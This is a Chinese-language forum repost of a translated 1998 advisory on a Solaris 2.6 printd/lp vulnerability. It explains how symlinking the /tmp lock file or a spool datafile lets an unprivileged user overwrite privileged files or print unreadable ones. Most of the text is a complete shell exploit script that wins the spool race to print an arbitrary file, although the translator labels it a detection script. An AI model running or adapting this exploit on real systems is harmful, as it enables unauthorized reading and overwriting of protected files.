printd(lp)漏洞
作者Silicosis 编译测试及中文翻译: 小鱼儿(littlefish@siom .com)
漏洞介绍: 存在于Solaris 2.6之上的printd(lp)漏洞,用户可以创建/改写特权文件, 打印本来不可以访问的 文件。
1.创建/改写特权文件:
SUN公司没有从过去的错误中吸取教训;TMP文件仍然是个问题,当列队打印 一个大文件的时候一个 lock文件(/tmp/.printd.lock)就生成了。在你打印他们前,把你要创建/改 写的文件和这个LOCK文 件的连接你将能获得这个文件修改权限。
当打印完成,你指示的文件属性将被置为640,其内容将包含printd的进程表 示符。
2.打印本来不可访问的文件:
SUN公司重新构造了他们在Solais 2.6中的假脱机程序,他们采用了一种类似 Sendmail的列队系统。
[~]lp .tcshrc [~]ls -al /var/spool/print total 12 drwxr-xr-x 2 root lp 512 Feb 20 12:44 . drwxrwxr-x 10 root bin 512 Feb 17 11:28 .. -rw-rw-r-- 1 root staff 4 Feb 20 12:44 .seq -rw-r----- 1 root staff 80 Feb 20 12:44 cfA037core lrwxrwxrwx 1 root staff 19 Feb 20 12:44 dfA037core -> /home/sili/.tcshrc -rw-r----- 1 root staff 23 Feb 20 12:44 xfA037core You have your control, transfer and datafiles. The datafile is jus t a symlink to the file you printed, so if you link the file you printed to something els e *before* the queue is flushed, printd will print it.
以下是检测这个漏洞的脚本文件内容:
----[CUT HERE: sol26lp]----
#!/bin/sh # #Print unreadable files on solaris2.6 #[email protected] # # --If it didn't work, change $BIGFILE to # something bigger. # # --Script usually works 80% of the time.. # Didn't work? Try again.. Throw something # at the printspooler to slow it down. #
TMPFILE="./.dmlr" BIGFILE="/usr/lib/libc.so.1"
if [ $# != 1 ]; then echo "Usage:" echo echo "./sol26lp <file>" echo echo "Print unreadable files on Solaris2.6" echo " [email protected]" exit 1 fi
echo "Need a large file to print, using $BIGFILE."cp /usr/bin/vi $ TMPFILE ; chmod 700 $TMPFILE lp $TMPFILE ; #sleep 1;
rm $TMPFILE ; ln -s $1 $TMPFILE
QF=`ls -al /var/spool/print |grep $TMPFILE |awk '{print $9}'`
echo "Queue File: /var/spool/print/$QF"
while [ -h /var/spool/print/$QF ]; do echo "Waiting for file to print"; sleep 1; done
echo "File printed. Erasing temp files." rm $TMPFILE
echo "Done." echo echo " [email protected] 1/20/98"
----[CUT HERE: sol26lp]----
本文由isbase成员编译或原创,如要转载请保持文章的完整性 欢迎访问我们的站点http://www.isbase.com 绿色兵团给你安全的保证
-- 我是[回合策略]版副,[宗教信仰]斑竹,欢迎大家常来坐坐。 欢迎光临魔法师学院http://wwwmagic.126.com或shizhao.topcool.net * * * * * 无挂碍故无有恐怖 --DOS--
※ 来源:.网易虚拟社区北京站 http://bj.netease.com.[FROM: 202.106.246.198]
|
|